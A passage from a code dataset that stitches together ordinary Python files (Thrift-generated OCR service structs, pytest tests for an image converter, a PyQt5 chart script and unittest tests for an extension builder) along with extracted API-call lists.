oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(line_ocr_result)
line_ocr_result.thrift_spec = (
(0, TType.STRING, 'success', 'UTF8', None, ), # 0
)
class cut_image_args(object):
"""
Attributes:
- image
- cut_type
"""
def __init__(self, image=None, cut_type=None,):
self.image = image
self.cut_type = cut_type
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.image = iprot.readBinary()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.BYTE:
self.cut_type = iprot.readByte()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('cut_image_args')
if self.image is not None:
oprot.writeFieldBegin('image', TType.STRING, 1)
oprot.writeBinary(self.image)
oprot.writeFieldEnd()
if self.cut_type is not None:
oprot.writeFieldBegin('cut_type', TType.BYTE, 2)
oprot.writeByte(self.cut_type)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(cut_image_args)
cut_image_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'image', 'BINARY', None, ), # 1
(2, TType.BYTE, 'cut_type', None, None, ), # 2
)
class cut_image_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = iprot.readBinary()
self.success.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('cut_image_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter6 in self.success:
oprot.writeBinary(iter6)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(cut_image_result)
cut_image_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING, 'BINARY', False), None, ), # 0
)
fix_spec(all_structs)
del all_structs
|
[
"logging.exception",
"thrift.Thrift.TApplicationException",
"thrift.TRecursive.fix_spec"
] |
[((25716, 25737), 'thrift.TRecursive.fix_spec', 'fix_spec', (['all_structs'], {}), '(all_structs)\n', (25724, 25737), False, 'from thrift.TRecursive import fix_spec\n'), ((1866, 1963), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.MISSING_RESULT', '"""version failed: unknown result"""'], {}), "(TApplicationException.MISSING_RESULT,\n 'version failed: unknown result')\n", (1887, 1963), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((2857, 2954), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.MISSING_RESULT', '"""get_ocr failed: unknown result"""'], {}), "(TApplicationException.MISSING_RESULT,\n 'get_ocr failed: unknown result')\n", (2878, 2954), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((3856, 3954), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.MISSING_RESULT', '"""line_ocr failed: unknown result"""'], {}), "(TApplicationException.MISSING_RESULT,\n 'line_ocr failed: unknown result')\n", (3877, 3954), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((4947, 5046), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.MISSING_RESULT', '"""cut_image failed: unknown result"""'], {}), "(TApplicationException.MISSING_RESULT,\n 'cut_image failed: unknown result')\n", (4968, 5046), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((1582, 1605), 'thrift.Thrift.TApplicationException', 'TApplicationException', ([], {}), '()\n', (1603, 1605), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((2573, 2596), 'thrift.Thrift.TApplicationException', 'TApplicationException', ([], {}), '()\n', (2594, 2596), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((3571, 3594), 'thrift.Thrift.TApplicationException', 'TApplicationException', ([], {}), '()\n', (3592, 3594), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((4661, 4684), 'thrift.Thrift.TApplicationException', 'TApplicationException', ([], {}), '()\n', (4682, 4684), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((5660, 5754), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.UNKNOWN_METHOD', "('Unknown function %s' % name)"], {}), "(TApplicationException.UNKNOWN_METHOD, \n 'Unknown function %s' % name)\n", (5681, 5754), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((6437, 6491), 'logging.exception', 'logging.exception', (['"""TApplication exception in handler"""'], {}), "('TApplication exception in handler')\n", (6454, 6491), False, 'import logging\n'), ((6600, 6652), 'logging.exception', 'logging.exception', (['"""Unexpected exception in handler"""'], {}), "('Unexpected exception in handler')\n", (6617, 6652), False, 'import logging\n'), ((6720, 6797), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.INTERNAL_ERROR', '"""Internal error"""'], {}), "(TApplicationException.INTERNAL_ERROR, 'Internal error')\n", (6741, 6797), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((7358, 7412), 'logging.exception', 'logging.exception', (['"""TApplication exception in handler"""'], {}), "('TApplication exception in handler')\n", (7375, 7412), False, 'import logging\n'), ((7521, 7573), 'logging.exception', 'logging.exception', (['"""Unexpected exception in handler"""'], {}), "('Unexpected exception in handler')\n", (7538, 7573), False, 'import logging\n'), ((7641, 7718), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.INTERNAL_ERROR', '"""Internal error"""'], {}), "(TApplicationException.INTERNAL_ERROR, 'Internal error')\n", (7662, 7718), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((8283, 8337), 'logging.exception', 'logging.exception', (['"""TApplication exception in handler"""'], {}), "('TApplication exception in handler')\n", (8300, 8337), False, 'import logging\n'), ((8446, 8498), 'logging.exception', 'logging.exception', (['"""Unexpected exception in handler"""'], {}), "('Unexpected exception in handler')\n", (8463, 8498), False, 'import logging\n'), ((8566, 8643), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.INTERNAL_ERROR', '"""Internal error"""'], {}), "(TApplicationException.INTERNAL_ERROR, 'Internal error')\n", (8587, 8643), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n'), ((9228, 9282), 'logging.exception', 'logging.exception', (['"""TApplication exception in handler"""'], {}), "('TApplication exception in handler')\n", (9245, 9282), False, 'import logging\n'), ((9391, 9443), 'logging.exception', 'logging.exception', (['"""Unexpected exception in handler"""'], {}), "('Unexpected exception in handler')\n", (9408, 9443), False, 'import logging\n'), ((9511, 9588), 'thrift.Thrift.TApplicationException', 'TApplicationException', (['TApplicationException.INTERNAL_ERROR', '"""Internal error"""'], {}), "(TApplicationException.INTERNAL_ERROR, 'Internal error')\n", (9532, 9588), False, 'from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException\n')]
|
import csv
import os
import cv2
import pytest
import numpy as np
from Converter import Converter
from Main import Application
from Processing import Processing
from Utilities import Writer
from Processing.GaussianNoise import GaussianNoise
class TestValidationCount(object):
def test_empty(self):
assert not Application().on_validate_count(P="")
def test_p_zero(self):
assert Application().on_validate_count(P="0")
def test_p_less(self):
assert Application().on_validate_count(P="2000")
def test_p_more(self):
assert not Application().on_validate_count(P="200000")
def test_value_error(self):
assert not Application().on_validate_count(P="asjkdhaksdh")
def test_negative(self):
assert not Application().on_validate_count(P="-1000")
class TestValidationRes(object):
def test_validation_res_p_empty(self):
assert not Application().on_validate_res(P="")
def test_validation_res_p_zero(self):
assert Application().on_validate_count(P="0")
def test_validation_res_p_less(self):
assert Application().on_validate_count(P="1900")
def test_validation_res_p_more(self):
assert not Application().on_validate_count(P="200000")
def test_validation_res_value_error(self):
assert not Application().on_validate_count(P="asjkdhaksdh")
def test_negative(self):
assert not Application().on_validate_count(P="-1000")
class TestWriter(object):
def test_correct_name(self):
file_name = "../images/buffer/training.csv"
Writer(file_name)
assert os.path.isfile(file_name)
os.remove(file_name)
def test_incorrect_name(self):
with pytest.raises(OSError):
Writer("&?akjhdsfksdf.csv")
def test_insert_row(self):
file_name = "../images/buffer/training.csv"
writer = Writer(file_name)
assert os.path.isfile(file_name)
writer.write_row_to_file("123")
writer.file.close()
file = open(file_name, "r")
reader = csv.reader(file)
for row in reader:
assert row == ['1', '2', '3']
file.close()
os.remove(file_name)
class TestConverter(object):
def test_bar(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Bar"
)
assert result[0] == '1'
def test_circle(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Circle"
)
assert result[0] == '2'
def test_dots(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Dots"
)
assert result[0] == '3'
def test_ellipse(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Ellipse"
)
assert result[0] == '4'
def test_popcorn(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Popcorn"
)
assert result[0] == '5'
def test_something(self):
result = Converter.convert_image_to_csv_row(
cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE),
"Something"
)
assert result[0] == '0'
def test_gaussian_noise():
image = cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE)
assert not np.array_equal(GaussianNoise.process(image), image)
def test_processing():
image = cv2.imread("../images/buffer/output.png", cv2.IMREAD_GRAYSCALE)
assert not np.array_equal(
Processing.process_image('../images/buffer/new.png'),
image
)
|
[
"os.remove",
"Processing.Processing.process_image",
"csv.reader",
"Main.Application",
"Utilities.Writer",
"cv2.imread",
"os.path.isfile",
"pytest.raises",
"Processing.GaussianNoise.GaussianNoise.process"
] |
[((3599, 3662), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (3609, 3662), False, 'import cv2\n'), ((3767, 3830), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (3777, 3830), False, 'import cv2\n'), ((1577, 1594), 'Utilities.Writer', 'Writer', (['file_name'], {}), '(file_name)\n', (1583, 1594), False, 'from Utilities import Writer\n'), ((1610, 1635), 'os.path.isfile', 'os.path.isfile', (['file_name'], {}), '(file_name)\n', (1624, 1635), False, 'import os\n'), ((1644, 1664), 'os.remove', 'os.remove', (['file_name'], {}), '(file_name)\n', (1653, 1664), False, 'import os\n'), ((1879, 1896), 'Utilities.Writer', 'Writer', (['file_name'], {}), '(file_name)\n', (1885, 1896), False, 'from Utilities import Writer\n'), ((1912, 1937), 'os.path.isfile', 'os.path.isfile', (['file_name'], {}), '(file_name)\n', (1926, 1937), False, 'import os\n'), ((2060, 2076), 'csv.reader', 'csv.reader', (['file'], {}), '(file)\n', (2070, 2076), False, 'import csv\n'), ((2175, 2195), 'os.remove', 'os.remove', (['file_name'], {}), '(file_name)\n', (2184, 2195), False, 'import os\n'), ((1714, 1736), 'pytest.raises', 'pytest.raises', (['OSError'], {}), '(OSError)\n', (1727, 1736), False, 'import pytest\n'), ((1750, 1777), 'Utilities.Writer', 'Writer', (['"""&?akjhdsfksdf.csv"""'], {}), "('&?akjhdsfksdf.csv')\n", (1756, 1777), False, 'from Utilities import Writer\n'), ((2316, 2379), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (2326, 2379), False, 'import cv2\n'), ((2535, 2598), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (2545, 2598), False, 'import cv2\n'), ((2755, 2818), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (2765, 2818), False, 'import cv2\n'), ((2976, 3039), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (2986, 3039), False, 'import cv2\n'), ((3200, 3263), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (3210, 3263), False, 'import cv2\n'), ((3426, 3489), 'cv2.imread', 'cv2.imread', (['"""../images/buffer/output.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('../images/buffer/output.png', cv2.IMREAD_GRAYSCALE)\n", (3436, 3489), False, 'import cv2\n'), ((3693, 3721), 'Processing.GaussianNoise.GaussianNoise.process', 'GaussianNoise.process', (['image'], {}), '(image)\n', (3714, 3721), False, 'from Processing.GaussianNoise import GaussianNoise\n'), ((3870, 3922), 'Processing.Processing.process_image', 'Processing.process_image', (['"""../images/buffer/new.png"""'], {}), "('../images/buffer/new.png')\n", (3894, 3922), False, 'from Processing import Processing\n'), ((404, 417), 'Main.Application', 'Application', ([], {}), '()\n', (415, 417), False, 'from Main import Application\n'), ((486, 499), 'Main.Application', 'Application', ([], {}), '()\n', (497, 499), False, 'from Main import Application\n'), ((1003, 1016), 'Main.Application', 'Application', ([], {}), '()\n', (1014, 1016), False, 'from Main import Application\n'), ((1100, 1113), 'Main.Application', 'Application', ([], {}), '()\n', (1111, 1113), False, 'from Main import Application\n'), ((323, 336), 'Main.Application', 'Application', ([], {}), '()\n', (334, 336), False, 'from Main import Application\n'), ((575, 588), 'Main.Application', 'Application', ([], {}), '()\n', (586, 588), False, 'from Main import Application\n'), ((671, 684), 'Main.Application', 'Application', ([], {}), '()\n', (682, 684), False, 'from Main import Application\n'), ((769, 782), 'Main.Application', 'Application', ([], {}), '()\n', (780, 782), False, 'from Main import Application\n'), ((909, 922), 'Main.Application', 'Application', ([], {}), '()\n', (920, 922), False, 'from Main import Application\n'), ((1204, 1217), 'Main.Application', 'Application', ([], {}), '()\n', (1215, 1217), False, 'from Main import Application\n'), ((1315, 1328), 'Main.Application', 'Application', ([], {}), '()\n', (1326, 1328), False, 'from Main import Application\n'), ((1413, 1426), 'Main.Application', 'Application', ([], {}), '()\n', (1424, 1426), False, 'from Main import Application\n')]
|
#!/usr/bin/env python
import sys
import scipy
from PyQt5 import QtCore, QtGui, QtWidgets, uic
from PyQt5.QtCore import Qt
# Constants
BLACK = QtGui.QColor('black')
WHITE = QtGui.QColor('white')
G_FONT = QtGui.QFont('Times New Roman', 16, 75)
PEN = QtGui.QPen(BLACK)
BLACK_BRUSH = QtGui.QBrush(BLACK, Qt.SolidPattern)
WHITE_BRUSH = QtGui.QBrush(WHITE, Qt.SolidPattern)
DASH_PEN = QtGui.QPen(BLACK_BRUSH, 1, Qt.DashLine)
DOT_PEN = QtGui.QPen(BLACK_BRUSH, 1, Qt.DotLine)
# Window
app = QtWidgets.QApplication(sys.argv)
window = QtWidgets.QMainWindow()
uic.loadUi('view.ui', window)
with open('view.css', 'r') as css:
app.setStyleSheet(css.read().replace('\n', ''))
def altitude_list():
model = QtCore.QStringListModel(
[str(a) for a in [0, 25, 50, 75, 100,
150, 200, 250,
300, 400, 500, 600, 700]])
window.altitudeList.setModel(model)
# Data items
f = scipy.vectorize(lambda t: (t - 120) * (t - 120) / 120)
g = scipy.vectorize(lambda t: (t - 160) * (t - 160) / 120 - 300)
ts = scipy.random.randint(120, 300, 10)
xs = f(ts) + (scipy.random.randn(len(ts)) - 0.5) * 3
ys = g(ts) + (scipy.random.randn(len(ts)) - 0.5) * 3
# The central graphics view
main_chart = window.lineChart
def draw_central_graphics():
scene = QtWidgets.QGraphicsScene(main_chart)
main_chart.setScene(scene)
def text(label, *args):
scene.addText(label, G_FONT).setPos(*args)
def line(*args):
scene.addLine(*args)
def dot(x, y, *args):
scene.addEllipse(x-5, y-5, 10, 10, *args)
# Axes
text('S', -60, 0)
text('N', 330, 0)
text('W Up', 0, -330)
text('E Down', 0, 330)
text('Div.= 2.0e-03', 100, 330)
# Ticks
line(0, 310, 0, -310)
for y in scipy.arange(-300, 310, 60): line(-3, y, 3, y)
line(-20, 0, 310, 0)
for x in scipy.arange(0, 310, 60): line(x, 3, x, -3)
# Curves
p = QtGui.QPainterPath(QtCore.QPoint(120, f(120)))
for x in range(120, 300): p.lineTo(x, f(x))
scene.addPath(p)
p = QtGui.QPainterPath(QtCore.QPoint(120, g(120)))
for x in range(120, 360, 10): p.lineTo(x, g(x))
scene.addPath(p, DASH_PEN)
# Data items
for t, x, y in zip(ts, xs, ys):
dot(t, x, BLACK, BLACK_BRUSH)
dot(t, y, BLACK, WHITE_BRUSH)
radar = window.radarChart
def draw_radar_chart():
scene = QtWidgets.QGraphicsScene(radar)
radar.setScene(scene)
# Rulers
scene.addLine(-300, 0, -294, 0)
scene.addLine(+300, 0, +294, 0)
scene.addLine(0, -300, 0, -294)
scene.addLine(0, +300, 0, +294)
scene.addLine(-10, 0, 10, 0)
scene.addLine(0, -10, 0, 10)
scene.addEllipse(-300, -300, 600, 600, BLACK)
# Data items
for x, y in zip(xs, ys):
scene.addEllipse(x, y, 10, 10, BLACK, BLACK_BRUSH)
altitude_list()
draw_central_graphics()
draw_radar_chart()
window.show()
app.exec()
|
[
"scipy.arange",
"scipy.vectorize",
"PyQt5.QtGui.QColor",
"PyQt5.QtWidgets.QMainWindow",
"scipy.random.randint",
"PyQt5.QtGui.QFont",
"PyQt5.uic.loadUi",
"PyQt5.QtGui.QPen",
"PyQt5.QtGui.QBrush",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QGraphicsScene"
] |
[((147, 168), 'PyQt5.QtGui.QColor', 'QtGui.QColor', (['"""black"""'], {}), "('black')\n", (159, 168), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((177, 198), 'PyQt5.QtGui.QColor', 'QtGui.QColor', (['"""white"""'], {}), "('white')\n", (189, 198), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((208, 246), 'PyQt5.QtGui.QFont', 'QtGui.QFont', (['"""Times New Roman"""', '(16)', '(75)'], {}), "('Times New Roman', 16, 75)\n", (219, 246), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((253, 270), 'PyQt5.QtGui.QPen', 'QtGui.QPen', (['BLACK'], {}), '(BLACK)\n', (263, 270), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((285, 321), 'PyQt5.QtGui.QBrush', 'QtGui.QBrush', (['BLACK', 'Qt.SolidPattern'], {}), '(BLACK, Qt.SolidPattern)\n', (297, 321), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((336, 372), 'PyQt5.QtGui.QBrush', 'QtGui.QBrush', (['WHITE', 'Qt.SolidPattern'], {}), '(WHITE, Qt.SolidPattern)\n', (348, 372), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((384, 423), 'PyQt5.QtGui.QPen', 'QtGui.QPen', (['BLACK_BRUSH', '(1)', 'Qt.DashLine'], {}), '(BLACK_BRUSH, 1, Qt.DashLine)\n', (394, 423), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((434, 472), 'PyQt5.QtGui.QPen', 'QtGui.QPen', (['BLACK_BRUSH', '(1)', 'Qt.DotLine'], {}), '(BLACK_BRUSH, 1, Qt.DotLine)\n', (444, 472), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((490, 522), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (512, 522), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((532, 555), 'PyQt5.QtWidgets.QMainWindow', 'QtWidgets.QMainWindow', ([], {}), '()\n', (553, 555), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((556, 585), 'PyQt5.uic.loadUi', 'uic.loadUi', (['"""view.ui"""', 'window'], {}), "('view.ui', window)\n", (566, 585), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((931, 985), 'scipy.vectorize', 'scipy.vectorize', (['(lambda t: (t - 120) * (t - 120) / 120)'], {}), '(lambda t: (t - 120) * (t - 120) / 120)\n', (946, 985), False, 'import scipy\n'), ((990, 1050), 'scipy.vectorize', 'scipy.vectorize', (['(lambda t: (t - 160) * (t - 160) / 120 - 300)'], {}), '(lambda t: (t - 160) * (t - 160) / 120 - 300)\n', (1005, 1050), False, 'import scipy\n'), ((1057, 1091), 'scipy.random.randint', 'scipy.random.randint', (['(120)', '(300)', '(10)'], {}), '(120, 300, 10)\n', (1077, 1091), False, 'import scipy\n'), ((1300, 1336), 'PyQt5.QtWidgets.QGraphicsScene', 'QtWidgets.QGraphicsScene', (['main_chart'], {}), '(main_chart)\n', (1324, 1336), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n'), ((1769, 1796), 'scipy.arange', 'scipy.arange', (['(-300)', '(310)', '(60)'], {}), '(-300, 310, 60)\n', (1781, 1796), False, 'import scipy\n'), ((1854, 1878), 'scipy.arange', 'scipy.arange', (['(0)', '(310)', '(60)'], {}), '(0, 310, 60)\n', (1866, 1878), False, 'import scipy\n'), ((2365, 2396), 'PyQt5.QtWidgets.QGraphicsScene', 'QtWidgets.QGraphicsScene', (['radar'], {}), '(radar)\n', (2389, 2396), False, 'from PyQt5 import QtCore, QtGui, QtWidgets, uic\n')]
|
import unittest
import os
import sys
import shutil
import copy
import zipfile
import json
from resilient_circuits.util.ext.ExtCreate import ExtCreate, PATH_DEFAULT_ICON_EXTENSION_LOGO, PATH_DEFAULT_ICON_COMPANY_LOGO
from resilient_circuits.util.ext import ExtException
# Import mock_data (need to add path to support relative imports in PY3)
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from ext_tests.mock_data.mock_data import MOCK_INTEGRATION_NAME, MOCK_INTEGRATION_URL, MOCK_INTEGRATION_LONG_DESCRIPTION, mock_import_definition, mock_import_definition_tagged, mock_config_str, mock_config_list, mock_setup_py_file_lines, mock_parsed_setup_py_attributes, mock_icon_extension_logo, mock_icon_company_logo, mock_message_destination_to_be_tagged, mock_message_destination_tagged, mock_extension_zip_file_structure, mock_executables_zip_file_structure
path_this_dir = os.path.dirname(os.path.realpath(__file__))
path_temp_test_dir = os.path.join(path_this_dir, "test_temp")
path_fn_mock_integration = os.path.join(path_this_dir, "mock_data", "fn_mock_integration")
path_mock_setup_py_file = os.path.join(path_fn_mock_integration, "setup.py")
path_mock_customize_py_file = os.path.join(path_fn_mock_integration, "fn_mock_integration", "util", "customize.py")
path_mock_config_py_file = os.path.join(path_fn_mock_integration, "fn_mock_integration", "util", "config.py")
path_mock_bd_true_tar = os.path.join(path_this_dir, "mock_data", "built_distributions", "true_tar_fn_mock_integration-1.0.0.tar.gz")
path_mock_bd_true_zip = os.path.join(path_this_dir, "mock_data", "built_distributions", "true_zip_fn_mock_integration-1.0.0.zip")
path_mock_bd_zipped_tar = os.path.join(path_this_dir, "mock_data", "built_distributions", "zipped_tar_fn_mock_integration-1.0.0.zip")
path_mock_export_res = os.path.join(path_this_dir, "mock_data", "ext-fn_mock_integration-1.0.0", "export.res")
path_mock_extension_json = os.path.join(path_this_dir, "mock_data", "ext-fn_mock_integration-1.0.0", "extension.json")
path_mock_exectuable_json = os.path.join(path_this_dir, "mock_data", "ext-fn_mock_integration-1.0.0", "executables", "executable.json")
def get_dict_from_json_file(file_path):
dict_to_return = {}
with open(file_path, 'r') as the_file:
dict_to_return = json.load(the_file)
return dict_to_return
class ExtCreateClassTestIndividualFns(unittest.TestCase):
maxDiff = None
def setUp(self):
# assertRaisesRegexp renamed to assertRaisesRegex in PY3.2
if sys.version_info < (3, 2):
self.assertRaisesRegex = self.assertRaisesRegexp
self.ext_create_class = ExtCreate("ext:package")
self.original_import_definition = copy.deepcopy(mock_import_definition)
self.original_mock_message_destination_to_be_tagged = copy.deepcopy(mock_message_destination_to_be_tagged[0])
def tearDown(self):
# Reset mock_import_definition object
mock_import_definition.clear()
mock_import_definition.update(copy.deepcopy(self.original_import_definition))
# Reset mock_message_destination_to_be_tagged
mock_message_destination_to_be_tagged[0].clear()
mock_message_destination_to_be_tagged[0].update(copy.deepcopy(self.original_mock_message_destination_to_be_tagged))
def test_get_import_definition_from_customize_py(self):
import_definition = self.ext_create_class.__get_import_definition_from_customize_py__(path_mock_customize_py_file)
self.assertEqual(import_definition, mock_import_definition)
def test_get_configs_from_config_py(self):
the_config_str, the_config_list = self.ext_create_class.__get_configs_from_config_py__(path_mock_config_py_file)
self.assertEqual(the_config_str, mock_config_str)
self.assertEqual(the_config_list, mock_config_list)
def test_parse_setup_attribute(self):
the_parsed_name_value = self.ext_create_class.__parse_setup_attribute__(path_mock_setup_py_file, mock_setup_py_file_lines, "name")
self.assertEqual(the_parsed_name_value, MOCK_INTEGRATION_NAME)
the_parsed_url_value = self.ext_create_class.__parse_setup_attribute__(path_mock_setup_py_file, mock_setup_py_file_lines, "url")
self.assertEqual(the_parsed_url_value, MOCK_INTEGRATION_URL)
the_parsed_long_description_value = self.ext_create_class.__parse_setup_attribute__(path_mock_setup_py_file, mock_setup_py_file_lines, "long_description")
self.assertEqual(the_parsed_long_description_value, MOCK_INTEGRATION_LONG_DESCRIPTION)
def test_parse_setup_py(self):
attribute_names = self.ext_create_class.supported_setup_py_attribute_names
parsed_setup_py_attributes = self.ext_create_class.__parse_setup_py__(path_mock_setup_py_file, attribute_names)
self.assertEqual(parsed_setup_py_attributes, mock_parsed_setup_py_attributes)
def test_get_icon(self):
path_extension_logo = os.path.join(path_fn_mock_integration, "icons", "extension_logo.png")
path_company_logo = os.path.join(path_fn_mock_integration, "icons", "company_logo.png")
path_to_corrupt_jpg_icon = os.path.join(path_fn_mock_integration, "icons", "mock_corrupt_icon.jpg")
path_to_corrupt_png_icon = os.path.join(path_fn_mock_integration, "icons", "mock_corrupt_icon.png")
# Test getting extension_logo
extension_logo_as_base64 = self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), path_extension_logo, 200, 72, PATH_DEFAULT_ICON_EXTENSION_LOGO)
self.assertEqual(extension_logo_as_base64, mock_icon_extension_logo)
# Test getting default extension_logo
extension_logo_as_base64 = self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), "", 200, 72, PATH_DEFAULT_ICON_EXTENSION_LOGO)
self.assertEqual(extension_logo_as_base64, mock_icon_extension_logo)
# Test getting company_logo
company_logo_as_base64 = self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_COMPANY_LOGO), path_company_logo, 100, 100, PATH_DEFAULT_ICON_COMPANY_LOGO)
self.assertEqual(company_logo_as_base64, mock_icon_company_logo)
# Test getting default company_logo
company_logo_as_base64 = self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_COMPANY_LOGO), "", 100, 100, PATH_DEFAULT_ICON_COMPANY_LOGO)
self.assertEqual(company_logo_as_base64, mock_icon_company_logo)
# Test invalid paths
